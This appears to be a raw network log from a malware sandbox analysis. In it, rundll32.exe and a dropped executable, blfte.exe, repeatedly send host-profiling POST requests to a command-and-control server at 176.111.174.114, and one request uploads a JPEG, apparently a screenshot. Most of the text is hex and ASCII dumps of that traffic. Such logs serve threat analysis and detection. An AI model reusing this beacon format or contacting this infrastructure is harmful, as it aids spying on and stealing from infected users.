                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:17.705573082 CEST4543INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          450192.168.2.450020176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:21.973414898 CEST11876OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          451176.111.174.11480192.168.2.450020C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:22.074280977 CEST11877INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          452192.168.2.450021176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:22.288805962 CEST11877OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          453176.111.174.11480192.168.2.450021C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:22.394026995 CEST11878INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          454192.168.2.450022176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:22.612209082 CEST11878OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          455176.111.174.11480192.168.2.450022C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:22.715763092 CEST11879INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          456192.168.2.450023176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:22.925429106 CEST11879OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          457176.111.174.11480192.168.2.450023C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.022763968 CEST11881INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          458192.168.2.450024176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.150165081 CEST11895OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:23.251713991 CEST11899OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:23.251749992 CEST11902OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:23.252121925 CEST11905OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:23.252156019 CEST11907OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:23.252639055 CEST11910OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:23.252882957 CEST11913OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:23.253087997 CEST11916OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:23.253353119 CEST11918OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:23.253576040 CEST11921OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:23.253935099 CEST11924OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
